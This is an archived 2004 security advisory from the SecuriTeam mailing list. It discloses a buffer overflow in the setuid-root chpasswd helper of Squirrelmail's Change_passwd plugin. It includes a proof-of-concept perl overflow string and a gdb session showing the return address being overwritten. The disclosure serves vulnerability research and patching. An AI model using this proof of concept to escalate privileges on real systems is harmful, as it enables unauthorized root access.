[UNIX] Squirrelmail Change_passwd Buffer Overflow

• Previous message: SecuriTeam: "[EXPL] WinZip MIME Parsing Buffer Overflow Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 18 Apr 2004 13:53:11 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Squirrelmail Change_passwd Buffer Overflow
------------------------------------------------------------------------

SUMMARY

 <http://www.squirrelmail.org/plugin_view.php?id=117> Change Passwd
plugin, is "a Squirrelmail plugin to allow your users to change his/her
system password in /etc/passwd or /etc/shadow, the plugin uses a C program
to make possible the alteration of the password".

A buffer overflow vulnerability in the plugin allows local attackers that
are able to call the plugin directly (usually only root and
apache/nobody/etc are) to cause it to overflow an internal buffer and
execute arbitrary code and gain elevated privileges (as the file is setuid
root).

DETAILS

Vulnerable Systems:
 * Squirrelmail's Change_passwd version 3.1

Vulnerable code:
The vulnerable code is inside main() function that neglects to verify
whether the size of the buffer of the user provided data is not too large
to the destination (when it calls the sprintf functions).

Proof of Concept:
# export RET=`perl -e 'print "BCDE".("A"x136)."0123"'`
# gdb ./chpasswd
GNU gdb 6.0-debian
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-linux"...
(gdb)
(gdb) r $RET a a
Starting program: /home/noam/change_passwd/chpasswd $RET a a

The user
BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0123 don't exist!

Program received signal SIGSEGV, Segmentation fault.
0x33323130 in ?? ()
(gdb) q

ADDITIONAL INFORMATION

The information has been provided by <mailto:matias@neiff.com.ar> Matias
Neiff.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] WinZip MIME Parsing Buffer Overflow Exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]